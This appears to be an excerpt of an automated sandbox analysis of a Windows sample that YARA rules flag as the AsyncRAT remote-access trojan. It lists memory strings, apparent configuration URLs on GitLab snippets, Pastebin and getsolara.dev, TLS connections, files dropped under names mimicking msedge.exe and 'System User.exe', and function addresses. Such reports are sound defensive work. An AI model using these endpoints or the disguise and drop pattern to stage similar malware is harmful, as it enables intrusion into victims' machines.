Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: YgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1489435505.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494618160.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340FA000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getsolara.dev
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getsolara.dev/api/endpoint.json
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234063000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://getsolara.dev/asset/discord.json
Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341C9000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ncs.roblox.com/upload
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nodejs.org
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234167000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: powershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/pjseRvyK
Source: YgJ5inWPQO.exe, 00000002.00000003.1473302298.000001D8A78EA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1496226400.000001D8A97FC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://peps.python.org/pep-0205/
Source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
Source: dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nodejs.org
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process information set: 01 00 00 00

System Summary

Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF581000
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF588BD0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A69D4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF589870
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A18E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF59DF60
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF598804
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF591FD0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A9798
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5917B0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF599F10
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A5EEC
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58AD1D
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF593610
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF59E5E0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF591DC4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF595DA0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A3C80
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF592C80
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A0938
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A6488
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A5C70
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58A4E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58A34B
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF591BC0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF59DACC
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A0938
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF598154
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A411C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF593A14
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5921D4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5919B4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF581000
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A69D4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF589870
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A18E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF59DF60
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF598804
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF591FD0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A9798
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5917B0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF599F10
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A5EEC
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58AD1D
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF593610
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF59E5E0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF591DC4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF595DA0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A3C80
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF592C80
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A0938
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A6488
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A5C70
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58A4E4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58A34B
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF591BC0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF588BD0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF59DACC
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A0938
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF598154
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5A411C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF593A14
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5921D4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF5919B4
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6073FC
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6023B0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB605F00
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6012B0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB602F70
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB608F50
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB601A00
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6055D0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB604650
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB601920
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB60F524
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6377E8
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB633DC0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB632DA0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB63C890
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB636060
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB633B20
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBCD48300
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBCD463A0
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB49896E72
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB49891290
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB498960C6
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB49891719
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB498920F1
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB4989108A
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Code function: 14_2_00007FFB498C6DB0
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Code function: 14_2_00007FFB498D2540
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Code function: 14_2_00007FFB498C4928
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 38_2_00007FFB498A1719
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 38_2_00007FFB498A1038
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 38_2_00007FFB498A20F1
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 39_2_00007FFB498B1719
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 39_2_00007FFB498B1038
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 39_2_00007FFB498B20F1
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 40_2_00007FFB49891719
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 40_2_00007FFB49891038
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 40_2_00007FFB498920F1
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 42_2_00007FFB498D1719
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 42_2_00007FFB498D1038
Source: C:\Users\user\AppData\Roaming\System User.exe | Code function: 42_2_00007FFB498D20F1
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll 36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: String function: 00007FF7FF582910 appears 34 times
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: String function: 00007FF7FF582710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe | Binary or memory string: OriginalFilename vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
Source: YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
